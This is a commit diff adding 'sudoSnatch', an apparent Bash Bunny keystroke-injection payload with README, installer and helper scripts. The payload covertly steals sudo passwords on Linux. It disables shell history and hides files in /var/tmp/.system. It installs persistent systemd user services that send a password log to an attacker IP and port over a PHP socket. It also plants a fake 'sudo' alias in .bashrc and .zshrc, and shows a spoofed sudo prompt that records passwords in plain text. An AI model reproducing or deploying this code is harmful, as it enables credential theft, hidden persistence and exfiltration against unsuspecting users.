uploaded sudoSnatch

payloads/library/credentials/sudoSnatch/README.md

@@ -0,0 +1,48 @@
+## About:
+* Title: sudoSnatch
+* Description: sudoSnatch grabs plain text passwords remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## sudoSnatch: sudoSnatch payload grabs sudo password in plain text and sends it back to attacker remotely/locally.
+
+### Features:
+* Plain text passwords.
+* Detailed password logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Injecting payload on target's system.
+* Checks whether internet is connected to the target system. 
+* If internet is connected then it sends clear text passwords to attacker. 
+
+### Changes to be made in payload.sh:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName       | Directory                     |
+| -------------- | ----------------------------- |
+| payload.txt    | /payloads/switch1/            |
+| payload.sh     | /payloads/                    |
+| shell          | /payloads/library/sudoSnatch/ |
+| systemMgr      | /payloads/library/sudoSnatch/ |
+
+* Note: Create directory named `sudoSnatch` in `/payloads/library/`
+### Usage:
+1.  Inject payload into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -l -p <port number>` use this command to fetch passwords.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 

payloads/library/credentials/sudoSnatch/payload.sh

@@ -0,0 +1,23 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
+chmod +x /var/tmp/.system/systemMgr
+touch /var/tmp/.system/sysLog
+echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+chmod +x /var/tmp/.system/reboot
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+systemctl --user enable --now reboot.service
+systemctl --user start --now reboot.service
+cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell

payloads/library/credentials/sudoSnatch/payload.txt

@@ -0,0 +1,56 @@
+# Title: sudoSnatch
+# Description: sudoSnatch grabs plain text passwords remotely/locally.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 1400
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 5000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH

payloads/library/credentials/sudoSnatch/shell

@@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+        echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+	echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+        echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
+fi

payloads/library/credentials/sudoSnatch/systemMgr

@@ -0,0 +1,5 @@
+#!/bin/bash
+echo -n "[sudo] password for $(whoami):"
+IFS="" read -s pass
+echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t  Password=[$pass]" >> /var/tmp/.system/sysLog
+echo -e "\nSorry, try again."